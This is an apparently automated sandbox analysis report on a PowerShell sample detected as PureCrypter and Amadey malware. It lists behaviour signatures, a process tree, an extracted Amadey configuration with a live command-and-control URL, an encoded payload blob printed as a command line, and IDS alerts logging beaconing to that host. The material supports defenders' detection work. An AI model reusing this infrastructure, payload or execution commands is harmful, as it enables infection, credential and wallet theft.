Edit tour

Windows Analysis Report
qOH6oNqqoi.ps1

Overview

General Information

Sample name:	qOH6oNqqoi.ps1 renamed because original name is a hash value
Original sample name:	47251c024e627999fc355cb16de2c9ff.ps1
Analysis ID:	1595154
MD5:	47251c024e627999fc355cb16de2c9ff
SHA1:	55644fc57ec194c6d91bafca5e71dbb6af10872c
SHA256:	3a88598c06ed2d49652942ca2236ef3779e01d3bf7d9806c6d45f64d1caa5170
Tags:	Amadeyps1user-abuse_ch
Infos:

Detection

PureCrypter, Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large array initializations

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Detected PureCrypter Trojan

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Monitors registry run keys for changes

Overwrites Mozilla Firefox settings

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qOH6oNqqoi.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 6872 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

powershell.exe (PID: 6468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\10000100141\34.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 5280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 6480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cvtres.exe (PID: 5660 cmdline: H4sIAAAAAAAEAD3Mz0rDMBwAYMoUoSroG4QdBX/mb013S7vKLg6pE0EjWNfMBW0DSbaJR9/JB/A1BMFH0YN4/Q7f8DtJv5L0M0kRoeWYlJIrSYQiTNGMq0JKIfBpxlmFhwfXtm/dJqCxWZi+Nf7oXwhGGS9spNscCMjRvmo729sQfROdLw6Xqwfj4+3kqqjq2fFFeTf5eB/UezkFKgRIAYzfDKYn6n7L7/zuzeo5vublSP/9+tzOvQtuEWFazfSZbzqzcf5JrzlgYJiRXNfm8XI9D2BezFuyi1uElwh3CIcfg6vl8uMAAAA= MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

explorer.exe (PID: 4464 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

chrome.exe (PID: 3756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data" "data:text/html,<title>PURE! CHROME</title>" --disable-fre --no-default-browser-check --no-first-run --mute-audio --enable-webgl --ignore-gpu-blacklist --use-gl=desktop MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-gl=desktop --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data" --mojo-platform-channel-handle=2320 --field-trial-handle=1956,i,13439096136627422704,13915757122637099083,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

firefox.exe (PID: 8096 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -no-remote -profile "C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8116 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -no-remote -profile C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7456 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2232 -parentBuildID 20230927232528 -prefsHandle 2176 -prefMapHandle 2160 -prefsLen 25187 -prefMapSize 238318 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {056debd8-2c32-4e4b-8d1a-c1211c19f384} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f2b66b710 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 5576 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3828 -parentBuildID 20230927232528 -prefsHandle 4060 -prefMapHandle 4112 -prefsLen 25339 -prefMapSize 238318 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bc9d08e-b767-42e6-af2a-e4e7600495b1} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f2b67b810 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 2372 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5348 -prefMapHandle 5344 -prefsLen 33506 -prefMapSize 238318 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71187824-d2c0-460a-97ac-7894c435e281} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f477e4d10 utility MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

pingsender.exe (PID: 1628 cmdline: "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/11b61c58-6867-4a5f-9aad-2f9d3c403f14/event/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\11b61c58-6867-4a5f-9aad-2f9d3c403f14 MD5: B380758F0DAA6B44346C7994EB2408D7)

conhost.exe (PID: 4524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

pingsender.exe (PID: 4432 cmdline: "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/47ecb6f6-6e2a-4b91-bef9-d3dd22eada1b/health/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\47ecb6f6-6e2a-4b91-bef9-d3dd22eada1b MD5: B380758F0DAA6B44346C7994EB2408D7)

conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

pingsender.exe (PID: 2224 cmdline: "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/a0ebe742-48e8-4a28-8e8d-154ae0edb2dd/main/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\a0ebe742-48e8-4a28-8e8d-154ae0edb2dd MD5: B380758F0DAA6B44346C7994EB2408D7)

conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 7468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data" "data:text/html,<title>PURE! CHROME</title>" --disable-fre --no-default-browser-check --no-first-run --mute-audio --enable-webgl --ignore-gpu-blacklist --use-gl=desktop MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 5316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "92.255.85.34/i2Fe32Z13/index.php", "Version": "5.18", "Install Folder": "dcd8893974", "Install File": "Gxtuum.exe"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\global-entities_metadata	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1531539658.000001F071990000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Process Memory Space: powershell.exe PID: 6468	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 6480	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6480	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.powershell.exe.1f071b290b0.3.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.powershell.exe.1f071b290b0.3.raw.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\10000100141\34.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\10000100141\34.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 6872, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\10000100141\34.ps1", ProcessId: 6468, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qOH6oNqqoi.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qOH6oNqqoi.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qOH6oNqqoi.ps1", ProcessId: 6792, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qOH6oNqqoi.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qOH6oNqqoi.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qOH6oNqqoi.ps1", ProcessId: 6792, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5316, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T14:35:52.691041+0100	2035595	1	Domain Observed Used for C2 Detected	92.255.85.34	56001	192.168.2.8	49925	TCP
2025-01-20T14:36:20.462818+0100	2035595	1	Domain Observed Used for C2 Detected	92.255.85.34	56001	192.168.2.8	50029	TCP

ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T14:38:48.306347+0100	2009207	1	A Network Trojan was detected	192.168.2.8	57775	185.208.37.90	3478	UDP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T14:34:28.735691+0100	2856147	1	A Network Trojan was detected	192.168.2.8	49712	92.255.85.34	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T14:34:17.263274+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49705	92.255.85.34	80	TCP
2025-01-20T14:34:21.808844+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49707	92.255.85.34	80	TCP
2025-01-20T14:34:26.392497+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49711	92.255.85.34	80	TCP
2025-01-20T14:34:31.018338+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49713	92.255.85.34	80	TCP
2025-01-20T14:34:35.670150+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49715	92.255.85.34	80	TCP
2025-01-20T14:34:40.227395+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49717	92.255.85.34	80	TCP
2025-01-20T14:34:44.802462+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49719	92.255.85.34	80	TCP
2025-01-20T14:34:49.370738+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49721	92.255.85.34	80	TCP
2025-01-20T14:34:54.129943+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49723	92.255.85.34	80	TCP
2025-01-20T14:34:58.722669+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49725	92.255.85.34	80	TCP
2025-01-20T14:35:03.271738+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49728	92.255.85.34	80	TCP
2025-01-20T14:35:07.881498+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49730	92.255.85.34	80	TCP
2025-01-20T14:35:18.517988+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49734	92.255.85.34	80	TCP
2025-01-20T14:35:23.213578+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49736	92.255.85.34	80	TCP
2025-01-20T14:35:27.784448+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49756	92.255.85.34	80	TCP
2025-01-20T14:35:32.347295+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49787	92.255.85.34	80	TCP
2025-01-20T14:35:36.989211+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49819	92.255.85.34	80	TCP
2025-01-20T14:35:41.707871+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49850	92.255.85.34	80	TCP
2025-01-20T14:35:50.836302+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49913	92.255.85.34	80	TCP
2025-01-20T14:35:55.398892+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49946	92.255.85.34	80	TCP
2025-01-20T14:35:59.972002+0100	2856148	1	A Network Trojan was detected	192.168.2.8	49978	92.255.85.34	80	TCP
2025-01-20T14:36:04.587296+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50009	92.255.85.34	80	TCP
2025-01-20T14:36:09.164695+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50024	92.255.85.34	80	TCP
2025-01-20T14:36:13.757489+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50026	92.255.85.34	80	TCP
2025-01-20T14:36:18.342806+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50028	92.255.85.34	80	TCP
2025-01-20T14:36:22.974925+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50033	92.255.85.34	80	TCP
2025-01-20T14:36:27.674779+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50047	92.255.85.34	80	TCP
2025-01-20T14:36:32.340168+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50055	92.255.85.34	80	TCP
2025-01-20T14:36:38.654136+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50058	92.255.85.34	80	TCP
2025-01-20T14:36:43.792516+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50074	92.255.85.34	80	TCP
2025-01-20T14:36:48.734290+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50092	92.255.85.34	80	TCP
2025-01-20T14:36:53.439823+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50099	92.255.85.34	80	TCP
2025-01-20T14:36:58.314015+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50105	92.255.85.34	80	TCP
2025-01-20T14:37:02.955091+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50115	92.255.85.34	80	TCP
2025-01-20T14:37:07.526574+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50124	92.255.85.34	80	TCP
2025-01-20T14:37:12.418204+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50127	92.255.85.34	80	TCP
2025-01-20T14:37:16.978910+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50130	92.255.85.34	80	TCP
2025-01-20T14:37:21.523563+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50136	92.255.85.34	80	TCP
2025-01-20T14:37:26.101424+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50167	92.255.85.34	80	TCP
2025-01-20T14:37:30.713067+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50174	92.255.85.34	80	TCP
2025-01-20T14:37:35.539372+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50189	92.255.85.34	80	TCP
2025-01-20T14:37:40.149171+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50192	92.255.85.34	80	TCP
2025-01-20T14:37:44.708368+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50194	92.255.85.34	80	TCP
2025-01-20T14:37:49.454921+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50196	92.255.85.34	80	TCP
2025-01-20T14:37:54.106319+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50204	92.255.85.34	80	TCP
2025-01-20T14:37:58.719209+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50214	92.255.85.34	80	TCP
2025-01-20T14:38:03.360457+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50225	92.255.85.34	80	TCP
2025-01-20T14:38:07.981075+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50234	92.255.85.34	80	TCP
2025-01-20T14:38:12.716239+0100	2856148	1	A Network Trojan was detected	192.168.2.8	50263	92.255.85.34	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T14:35:10.090470+0100	2803305	3	Unknown Traffic	192.168.2.8	49731	92.255.57.155	80	TCP

ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T14:34:15.043898+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49704	92.255.85.34	80	TCP
2025-01-20T14:34:19.590851+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49706	92.255.85.34	80	TCP
2025-01-20T14:34:24.139353+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49710	92.255.85.34	80	TCP
2025-01-20T14:34:28.735691+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49712	92.255.85.34	80	TCP
2025-01-20T14:34:33.422168+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49714	92.255.85.34	80	TCP
2025-01-20T14:34:37.991956+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49716	92.255.85.34	80	TCP
2025-01-20T14:34:42.588715+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49718	92.255.85.34	80	TCP
2025-01-20T14:34:47.141214+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49720	92.255.85.34	80	TCP
2025-01-20T14:34:51.892513+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49722	92.255.85.34	80	TCP
2025-01-20T14:34:56.441732+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49724	92.255.85.34	80	TCP
2025-01-20T14:35:01.040253+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49727	92.255.85.34	80	TCP
2025-01-20T14:35:05.624274+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49729	92.255.85.34	80	TCP
2025-01-20T14:35:16.267003+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49733	92.255.85.34	80	TCP
2025-01-20T14:35:20.866044+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49735	92.255.85.34	80	TCP
2025-01-20T14:35:25.548285+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49744	92.255.85.34	80	TCP
2025-01-20T14:35:30.111474+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49771	92.255.85.34	80	TCP
2025-01-20T14:35:34.672241+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49805	92.255.85.34	80	TCP
2025-01-20T14:35:39.454407+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49837	92.255.85.34	80	TCP
2025-01-20T14:35:48.605265+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49898	92.255.85.34	80	TCP
2025-01-20T14:35:53.181691+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49930	92.255.85.34	80	TCP
2025-01-20T14:35:57.756349+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49962	92.255.85.34	80	TCP
2025-01-20T14:36:02.324007+0100	2856097	1	A Network Trojan was detected	192.168.2.8	49994	92.255.85.34	80	TCP
2025-01-20T14:36:06.934766+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50023	92.255.85.34	80	TCP
2025-01-20T14:36:11.514294+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50025	92.255.85.34	80	TCP
2025-01-20T14:36:16.094223+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50027	92.255.85.34	80	TCP
2025-01-20T14:36:20.697344+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50030	92.255.85.34	80	TCP
2025-01-20T14:36:25.347740+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50038	92.255.85.34	80	TCP
2025-01-20T14:36:30.012625+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50051	92.255.85.34	80	TCP
2025-01-20T14:36:34.793809+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50057	92.255.85.34	80	TCP
2025-01-20T14:36:41.231819+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50067	92.255.85.34	80	TCP
2025-01-20T14:36:46.478499+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50088	92.255.85.34	80	TCP
2025-01-20T14:36:51.080520+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50095	92.255.85.34	80	TCP
2025-01-20T14:36:56.029668+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50103	92.255.85.34	80	TCP
2025-01-20T14:37:00.694224+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50108	92.255.85.34	80	TCP
2025-01-20T14:37:05.302162+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50120	92.255.85.34	80	TCP
2025-01-20T14:37:09.917985+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50125	92.255.85.34	80	TCP
